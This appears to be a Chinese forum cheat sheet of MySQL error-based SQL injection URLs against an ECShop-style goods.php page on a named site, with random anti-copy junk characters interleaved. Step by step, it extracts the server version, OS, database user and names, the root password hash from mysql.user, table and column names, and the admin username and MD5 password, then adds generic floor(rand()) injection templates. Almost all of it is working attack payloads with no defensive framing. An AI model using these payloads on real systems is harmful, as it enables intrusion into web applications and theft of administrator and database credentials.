判断版本号 , E8 }/ F" F" N! e9 L5 z5 z( d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& L3 o& ]; c- n* _# C4 L
% T. L( ^) ?( Z判断系统" L' t2 `) N0 z; c6 v7 [3 a
* r6 o0 L! b* {" u. G! F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" ]" S4 ?1 q* U* x- ]3 h: ~
$ y: v$ k/ r( A5 y. f& I$ ^. N
; l/ x" W0 V+ y6 p: r
* a! a8 ^9 E7 `0 r1 P. {8 u当前 user()/ D* ?7 q6 v. j: X0 p) S- l% H
# D% G' C7 r3 A' I% O$ Bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& X( K! z8 [5 m5 X8 Y2 c1 T( k2 L A5 |( S# D8 ~, _* i: E
3 B: l4 d, `5 t8 V. F. [5 J8 ~- L- Y0 K, Q4 {( G
当前 database()
' p( q" p W7 l) K$ ?& _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 A8 ^/ A/ l: r) Z) B4 o5 `4 C7 `* I V' n( j) W/ [
# a* ~! m7 X" n) U
9 _, e o# N1 \6 m2 i6 a4 h
: Z1 `/ _% ~) S3 n- i/ \" Q6 Kroot hash7 V8 A& o% ~0 G$ l6 e
$ L5 A- b. s# d* ?http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* S, V) t( \5 @% D' J
% X9 l- @2 r( ^' k- p' z8 q4 u; j- L9 D7 C+ p
9 r5 s+ @6 A) D) A6 ] j7 F' \' S当前 数据库表名
4 j2 N5 c# t5 P9 j! ?
! J; | _* ?* y3 c t E8 G( ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' N% H* c8 Y3 G% s1 t& _! w
3 ^2 _) M8 W+ r% Q
! A! M0 J- R$ O& A! ]
! z6 t( P* u3 w4 n当前 数据库 user_name 字段+ A8 R2 {/ C* n, r8 S
. `5 K3 d. E, V, O; o8 K4 s; A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% z) d8 U) O: Y9 e; t! B! ?
$ C! F. i% ]5 W) Q, Q6 @5 h当前 数据库 字段 password% s2 j2 z' N U3 B, q# b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 z" a" l. {3 |3 g( I/ ~
7 c( s! @% R8 z' [, w
3 p0 O9 `& l% j) {. E$ x, T& b' b0 l' `! W* L/ m' M# V0 f
获得 admin passwd(md5)0 D; P5 W5 j: J S; Z$ U9 M$ Z
2 D& U# c* {# I) A, W( d
4 _/ ~& H2 j% Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) g1 f& j# o& R( B
# G/ ?1 D! o0 S7 V
报错注射8 X2 H, G3 I( f2 a" o
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
/ [: L7 H: l/ r( h0 u% |# V9 D9 h4 ]1 C: B X
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# |8 D0 `& c& S
, U+ r' V# F7 L* y6 qand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |